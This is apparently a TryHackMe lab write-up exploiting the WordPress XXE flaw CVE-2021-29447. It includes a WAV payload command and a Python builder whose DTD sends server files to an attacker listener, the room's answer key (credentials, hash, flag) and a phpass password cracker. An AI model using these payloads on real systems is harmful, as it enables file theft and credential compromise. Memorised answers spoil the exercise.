We covered a WordPress XXE vulnerability, CVE-2021-29447, that allows sensitive-file disclosure and server-side request forgery (SSRF). We exploited it by generating a malicious WAV payload and uploading it through the Media Library of the target WordPress site with an authenticated account that has upload rights (Author or above). This was part of the TryHackMe WordPress: CVE-2021-29447 room.
Highlights
What is XXE vulnerability
An XML External Entity (XXE) attack abuses the external-entity feature of XML parsers: XML input that declares an entity pointing at a file or URL is expanded by the parser with that resource's contents. It often lets an attacker read files on the server that parses the XML and interact with back-end or external systems the application itself can reach. It can also be used for denial of service (DoS), for Server-Side Request Forgery (SSRF) by inducing the application to make requests to other systems, and in some environments for port scanning or even remote code execution.
WordPress CVE-2021-29447 Impact
- Arbitrary File Disclosure: the contents of any file readable by the web server process could be retrieved, e.g. wp-config.php, which contains sensitive data such as the database credentials.
- Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.
Creating The Payload
You can create the WAV payload with the command below. The RIFF/WAVE header is followed by an iXML chunk whose XML DOCTYPE declares a parameter entity pointing at a DTD on your server; %init; and %trick; are defined in that remote DTD, and the final \x00 terminates the chunk. Replace YOURSERVERIP, PORT and NAMEEVIL.dtd with your listener's address and the name of the DTD you host there.
# create the WAV file; change the IP, port and DTD name to match your listener
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSERVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
The \x7b (123) iXML length equals the XML text plus the trailing NUL with the placeholders exactly as written; if your URL is longer than the placeholder, increase that size field accordingly or the XML will be cut short before %trick; is reached. Note that the bug is only reachable on PHP 8 (see the WPScan reference below) and the uploading account needs media-upload rights (Author or above).
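The following Python script is added here as a worked example; it is not part of the room or of the public PoC. It builds the same WAV structure as the echo command above but computes the chunk sizes from the XML, writes the external DTD that %remote; fetches (which the page does not show), and decodes the exfiltrated ?p= value from the listener's log. The attacker URL http://10.0.0.1:8000, the file names evil.dtd and payload.wav, and the php://filter/convert.base64-encode read chain are assumptions; the PoC you use may read the file through a different filter chain. The request line in the docstring is a constructed sample.

```python
"""CVE-2021-29447 XXE payload builder: a minimal RIFF/WAVE file whose iXML
chunk carries the DOCTYPE, plus the external DTD it pulls, plus a decoder
for the exfiltrated data. Added example, not the room's or the PoC's code.
ASSUMPTIONS: ATTACKER, TARGET_FILE and the php://filter chain below."""
import base64
import struct
from urllib.parse import unquote

ATTACKER = "http://10.0.0.1:8000"   # assumed listener address; change it
TARGET_FILE = "/etc/passwd"          # assumed file to read from the target


def build_dtd(attacker: str, target_file: str) -> str:
    """External DTD fetched by %remote;.  %file reads the target file through
    a PHP filter so its bytes come out base64-encoded (safe inside a URL and
    inside XML).  %init declares %trick at parse time (the &#x25; escape keeps
    the inner '%' from being expanded too early); %trick then fires the
    request that carries the file to the listener."""
    return (
        f'<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource={target_file}">\n'
        f"<!ENTITY % init \"<!ENTITY &#x25; trick SYSTEM '{attacker}/?p=%file;'>\">\n"
    )


def build_wav(dtd_url: str) -> bytes:
    """'RIFF' <size> 'WAVE' + one 'iXML' chunk.  Both sizes are little-endian
    uint32 computed from the XML, so any DTD URL length works."""
    xml = (
        '<?xml version="1.0"?>'
        f"<!DOCTYPE ANY[<!ENTITY % remote SYSTEM '{dtd_url}'>%remote;%init;%trick;]>"
    ).encode() + b"\x00"                        # NUL terminator as in the PoC
    ixml_chunk = b"iXML" + struct.pack("<I", len(xml)) + xml
    riff_body = b"WAVE" + ixml_chunk
    return b"RIFF" + struct.pack("<I", len(riff_body)) + riff_body


def decode_exfil(request_line: str) -> bytes:
    """Turn the listener's log line (constructed sample:
    'GET /?p=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaA== HTTP/1.1')
    back into the file bytes."""
    path = request_line.split(" ")[1]
    raw = path.split("?p=", 1)[1]
    # unquote(), not parse_qs()/unquote_plus(): '+' is a base64 digit here,
    # and the plus-to-space rule of form decoding would corrupt the data.
    return base64.b64decode(unquote(raw))


if __name__ == "__main__":
    with open("evil.dtd", "w") as f:
        f.write(build_dtd(ATTACKER, TARGET_FILE))
    with open("payload.wav", "wb") as f:
        f.write(build_wav(f"{ATTACKER}/evil.dtd"))
    print("wrote evil.dtd and payload.wav; serve with: python3 -m http.server 8000")
```

Run it, serve the directory with python3 -m http.server 8000, upload payload.wav through the Media Library, and watch the listener for a GET /evil.dtd followed by a GET /?p=<base64>; pass that log line to decode_exfil. Reading through php://filter instead of a plain file:// entity matters because raw file contents (newlines, <, &) would break both the XML and the URL, whereas base64 output is URL-safe apart from +, which is why the decoder deliberately avoids parse_qs.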
References
- WordPress 5.7 – 'Media Library' XML External Entity Injection (XXE) (Authenticated): Exploit-DB
- WordPress 5.6-5.7 – Authenticated (Author+) XXE (CVE-2021-29447): GitHub
- WordPress 5.6-5.7 – Authenticated XXE Within the Media Library Affecting PHP 8: WPScan
Room Answers
Based on the results of #1, what is the name of the database for WordPress?
wordpressdb2
Based on the results of #1, what are the credentials you found?
example: user:password
thedarktangent:sUp3rS3cret132
Enumerate and identify the DBMS installed on the server.
MySQL
Based on the results of #4, what is the DBMS version installed on the server?
5.7.33
Based on the results of #4, what port is the DBMS running on?
3306
Compromise the DBMS. What is the hashed password located in the WordPress users table with id 1?
$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1
Based on the results of #7, what is the password in plain text?
teddybear
Compromise the machine and locate flag.txt
thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c72}
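The $P$ prefix in answer #7 marks a phpass portable hash, the scheme WordPress used for all passwords before it moved to bcrypt in 6.8 (hashcat mode 400, john --format=phpass). The following Python is added here as an example and is not part of the room: it reimplements the scheme so the cracked password from answer #8 can be verified offline and a small wordlist attack run without external tools. ROOM_HASH and the password are the room's values; CONSTRUCTED_WORDLIST and the $P$7abcdefgh setting used in the self-test are constructed.

```python
"""phpass portable-hash ($P$ / $H$) verifier and tiny wordlist cracker.
Added example; not the room's tooling.  ROOM_HASH is the value from answer
#7; CONSTRUCTED_WORDLIST is made up for the demonstration."""
import hashlib
import hmac
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
ROOM_HASH = "$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1"
CONSTRUCTED_WORDLIST = ["password", "wordpress", "admin123", "teddybear"]


def _encode64(data: bytes) -> str:
    """phpass's own base64 variant: 6-bit groups taken little-endian from
    each 3-byte block, ITOA64 alphabet, no padding (16 bytes -> 22 chars)."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password: str, setting: str) -> str:
    """Recompute the hash from its 12-char setting: '$P$' + cost char + 8-char
    salt.  Cost char c means 2**index(c) MD5 rounds ('B' -> 2**13 = 8192)."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("cost out of range")
    salt = setting[4:12]
    if len(salt) != 8:
        raise ValueError("salt must be 8 characters")
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):               # iterated MD5, password re-mixed each round
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest)


def check_phpass(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash with the stored one."""
    return hmac.compare_digest(phpass_hash(password, stored[:12]), stored)


def crack(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that matches the stored hash, or None."""
    for cand in candidates:
        if check_phpass(cand, stored):
            return cand
    return None


if __name__ == "__main__":
    print(crack(ROOM_HASH, CONSTRUCTED_WORDLIST))  # -> teddybear
```

The cost character after $P$ is what makes this cheap to brute-force: 'B' means only 8192 MD5 rounds per guess, which is why rockyou-sized wordlists fall quickly to hashcat or john and why WordPress eventually replaced the scheme with bcrypt.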
Video Walkthrough